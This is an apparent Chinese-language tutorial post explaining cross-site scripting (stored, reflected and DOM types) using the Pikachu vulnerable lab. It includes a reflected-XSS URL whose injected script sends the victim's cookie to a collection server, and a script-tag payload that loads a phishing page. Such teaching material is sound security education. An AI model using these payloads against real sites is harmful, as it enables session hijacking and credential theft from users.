XSS全称CSS (Cross Site Script) ,跨站脚本攻击,XSS属于客户端攻击,它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意的特殊目的。
造成XSS漏洞的原因是程序对输入和输出的控制不够严格,导致"精心构造“的脚本输入后,在输到前端时被浏览器当作有效代码解析执行从而产生危害
XSS从利用角度分为三类,分别是:存储型,反射型,DOM型.
攻击者传递的恶意参数存储在服务端,例如数据库中,永久性存储,稳定性强.
交互的数据不会存储在数据库,只会操作一次,把用户输入的数据反射给浏览器.
不与后台服务器产生数据交互,通过前端的dom节点形成的XSS漏洞.可以理解为,一个与系统平台和编程语言无关的接口,程序和脚本可以通过这个接口动态的访问和修改文档内容、结构和样式.当创建好一个页面并加载到浏览器时,DOM就悄然而生,它会把网页文档转换为文档对象,主要功能是处理页面内容.故可以使用Javascript语言来操作DOM已达到网页的目的.
只要有输入且能输出的地方都有可能存在XSS漏洞
劫持用户cookie是最常见的跨站攻击形式,通过在网页中写入并执行脚本执行文件(多数情况下是JavaScript脚本代码),劫持用户浏览器,将用户当前使用的sessionID信息发送至攻击者控制的网站或服务器中。
http://192.168.60.128:999/pikachu/vul/xss/xss_reflected_get.php?message='"><script>document.location = 'http://192.168.60.128:999/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>&submit=submit
点击访问.利用JS脚本的基本功能之一:操作网页中的DOM树结构和内容,在网页中通过JS脚本,生成虚假的页面,欺骗用户执行操作,而用户所有的输入内容都会被发送到攻击者的服务器
111'"><script src="http://192.168.60.128:999/pikachu/pkxss/xfish/fish.php"></script>
注:本文用到漏洞平台为pikachu
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。